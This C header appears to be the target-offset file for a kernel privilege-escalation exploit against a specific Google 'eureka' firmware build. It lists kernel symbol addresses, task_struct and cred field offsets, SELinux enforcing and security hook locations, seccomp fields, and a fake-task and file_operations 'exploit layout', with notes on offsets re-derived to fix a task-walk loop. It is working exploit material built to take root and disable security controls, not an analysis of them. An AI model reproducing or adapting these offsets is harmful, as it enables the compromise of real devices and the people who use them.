/*
 * eureka-52433670036000520 target offsets
 * Generated by disassembly analysis of kernel.elf (firmware 2.7)
 * Base: 0xffffffc008000000
 *
 * Confirmed changed from 52168470043600520:
 *   TASK_TASKS_OFF   0x4C0 → 0x628  ← root cause of the loop (task walk)
 *   TASK_COMM_OFF    0x788 → 0x850  ← root cause of the loop (task name match)
 *   TASK_SECCOMP_OFF 0x830 → 0x838
 *
 * Confirmed unchanged: TASK_REAL_CRED_OFF, TASK_CRED_OFF,
 *   FAKE_TASK_PRIO_OFF, FAKE_TASK_NORMAL_PRIO_OFF,
 *   FAKE_TASK_TASK_GROUP_OFF, FAKE_TASK_PI_LOCK_OFF,
 *   FAKE_TASK_PI_WAITERS_OFF, FAKE_TASK_PI_BLOCKED_ON_OFF
 *   rt_mutex_waiter fields (separate struct, unaffected by task_struct growth)
 */
#ifndef TARGET_H
#define TARGET_H

#define BUILD_VARIANT_LABEL "eureka_q3_52433670036000520"
#define BUILD_FINGERPRINT "google/eureka/eureka:17/RELEASE/52433670036000520:user/release-keys"

#define KIMAGE_TEXT_BASE_DEFAULT 0xffffffc008000000ULL
#define P0_PAGE_OFFSET           0xffffff8000000000ULL
#define P0_PHYS_OFFSET           0x80000000ULL
#define P0_KERNEL_PHYS_LOAD      0xA8000000ULL
#define KERNELSNITCH_IDENTITY_START 0xffffff8000000000ULL
#define KERNELSNITCH_IDENTITY_END   0xffffff9000000000ULL
#define DIRECT_MAP_BASE          0xffffff8000000000ULL
#define DIRECT_MAP_END           0xFFFFFFC000000000ULL
#define VMEMMAP_START            0xFFFFFFFEFFE00000ULL

/* Symbol offsets — all overridden at runtime by ionstack.conf */
#define RANDOM_MISC_FOPS_OFF        0x1e92b38ULL
#define ASHMEM_MISC_FOPS_OFF        0x281a1c8ULL
#define ASHMEM_FOPS_OFF             0x01ec9f70ULL
#define ASHMEM_IOCTL_OFF            0x0143a1a0ULL
#define ASHMEM_COMPAT_IOCTL_OFF     0x0143a1a8ULL
#define ASHMEM_MMAP_OFF             0x01425588ULL
#define ASHMEM_OPEN_OFF             0x01435128ULL
#define ASHMEM_RELEASE_OFF          0x01435130ULL
#define ASHMEM_SHOW_FDINFO_OFF      0x01425700ULL
#define ASHMEM_READ_ITER_OFF        0x01425488ULL
#define CONFIGFS_READ_FILE_OFF      0x014341b8ULL
#define CONFIGFS_WRITE_BIN_FILE_OFF 0x01434588ULL
#define COPY_SPLICE_READ_OFF        0x01425670ULL
#define NOOP_LLSEEK_OFF             0x014227c8ULL
#define INIT_TASK_OFF               0x027ecd40ULL
#define INIT_UTS_NS_OFF             0x0283a4a8ULL
#define EMPTY_ZERO_PAGE_OFF         0x028ed000ULL
#define ROOT_TASK_GROUP_OFF         0x028f1700ULL
#define SELINUX_BLOB_SIZES_OFF      0x01f06630ULL
#define SELINUX_ENFORCING_OFF       0x02943198ULL
#define SECURITY_HOOK_HEADS_OFF     0x01f04250ULL
#define KMALLOC_CACHES_OFF          0x01f07070ULL
#define ANON_PIPE_BUF_OPS_OFF       0x01db2328ULL
#define SLIDE_RANDOM_BOOT_ID_DATA_OFF 0x027e6fa0ULL
#define SLIDE_SYSCTL_BOOTID_OFF     0x02a501d9ULL
#define SLIDE_LOGGERS_0_1_OFF       0x026eed88ULL
#define SLIDE_NFULNL_LOGGER_OFF     0x026eee58ULL

/* ── task_struct offsets ──────────────────────────────────────────────────── */

/* CONFIRMED CHANGED — these were the loop cause */
#define TASK_TASKS_OFF          0x628ULL  /* was 0x4C0 — task linked list */
#define TASK_COMM_OFF           0x850ULL  /* was 0x788 — process name    */
#define TASK_SECCOMP_OFF        0x838ULL  /* was 0x830                   */

/* CONFIRMED UNCHANGED */
#define TASK_REAL_CRED_OFF      0x770ULL
#define TASK_CRED_OFF           0x778ULL

/* UNCHANGED (early in struct, before the growth region) */
#define TASK_THREAD_INFO_FLAGS_OFF 0x00ULL
#define FAKE_TASK_USAGE_OFF     0x38ULL

/* UNCHANGED — confirmed by rt_mutex_setprio disassembly */
#define FAKE_TASK_PRIO_OFF          0x94ULL
#define FAKE_TASK_NORMAL_PRIO_OFF   0x9cULL

/* UNCHANGED — confirmed by sched_change_group / pi functions */
#define FAKE_TASK_TASK_GROUP_OFF    0x310ULL
#define FAKE_TASK_PI_LOCK_OFF       0x854ULL
#define FAKE_TASK_PI_WAITERS_OFF    0x868ULL
#define FAKE_TASK_PI_TOP_TASK_OFF   0x878ULL
#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x880ULL

/* PID/TGID — between new TASKS(0x628) and new COMM(0x850).
 * Old distance from TASKS to PID was 0x100; estimated unchanged delta.
 * Best estimate: 0x628 + 0x100 = 0x728. Adjust if task walk finds wrong proc. */
#define TASK_PID_OFF            0x728ULL  /* was 0x5C0 — ESTIMATE, verify */
#define TASK_TGID_OFF           0x72CULL  /* was 0x5C4 — ESTIMATE, verify */
#define TASK_REAL_PARENT_OFF    0x740ULL  /* was 0x5D0 — ESTIMATE         */
#define TASK_ATOMIC_FLAGS_OFF   0x6F0ULL  /* was 0x588 — ESTIMATE         */

/* ── rt_mutex_waiter offsets (separate struct — unchanged) ───────────────── */
#define WAITER_TREE_ENTRY_OFF       0x00
#define WAITER_PI_TREE_ENTRY_OFF    0x18
#define WAITER_TASK_OFF             0x30
#define WAITER_LOCK_OFF             0x38
#define WAITER_PRIO_OFF             0x40
#define WAITER_DEADLINE_OFF         0x48

#define FAKE_WAITER_PI_TREE_ENTRY_OFF WAITER_PI_TREE_ENTRY_OFF
#define FAKE_WAITER_TASK_OFF          WAITER_TASK_OFF
#define FAKE_WAITER_LOCK_OFF          WAITER_LOCK_OFF
#define FAKE_WAITER_DEADLINE_OFF      WAITER_DEADLINE_OFF

/* ── page/exploit layout ─────────────────────────────────────────────────── */
#define LOCK_OFF    0x1000
#define FOPS_OFF    0x2000
#define W0_OFF      0x2400
#define FAKE_TASK_OFF 0x3000

/* ── configfs_buffer offsets (unchanged) ─────────────────────────────────── */
#define CFG_PAGE_OFF              16
#define CFG_NEEDS_READ_FILL_OFF   80
#define CFG_BIN_BUFFER_OFF        88
#define CFG_BIN_BUFFER_SIZE_OFF   96
#define CFG_CB_MAX_SIZE_OFF       100

/* ── cred offsets (unchanged) ────────────────────────────────────────────── */
#define CRED_UID_OFF            0x4
#define CRED_SECUREBITS_OFF     0x24
#define CRED_CAPS_OFF           0x28
#define CRED_SECURITY_OFF       0x78
#define CRED_USER_OFF           0x80
#define SELINUX_CRED_BLOB_OFF   0
#define SELINUX_CRED_OSID_OFF   0
#define SELINUX_CRED_SID_OFF    4

/* ── seccomp / thread_info / pipe (unchanged) ────────────────────────────── */
#define SECCOMP_MODE_OFF            0x00
#define SECCOMP_FILTER_COUNT_OFF    0x04
#define SECCOMP_FILTER_OFF          0x08
#define TIF_SECCOMP_BIT             11
#define PFA_NO_NEW_PRIVS_BIT        0
#define STRUCT_PAGE_SIZE            0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_SLAB_CACHE_OFF       0x18
#define STRUCT_PAGE_TYPE_OFF        0x30
#define PIPE_BUFFER_SIZE            0x28
#define PIPE_BUFFER_SLOTS           32
#define PIPE_BUF_FLAG_CAN_MERGE     0x10

/* ── file_operations field offsets (unchanged) ───────────────────────────── */
#define FOPS_OWNER_OFF          0x00
#define FOPS_LLSEEK_OFF         0x08
#define FOPS_READ_OFF           0x10
#define FOPS_WRITE_OFF          0x18
#define FOPS_READ_ITER_OFF      0x20
#define FOPS_WRITE_ITER_OFF     0x28
#define FOPS_IOCTL_OFF          0x50
#define FOPS_COMPAT_IOCTL_OFF   0x58
#define FOPS_MMAP_OFF           0x60
#define FOPS_OPEN_OFF           0x70
#define FOPS_RELEASE_OFF        0x80
#define FOPS_SPLICE_READ_OFF    0xc8
#define FOPS_SHOW_FDINFO_OFF    0xe0

#endif /* TARGET_H */
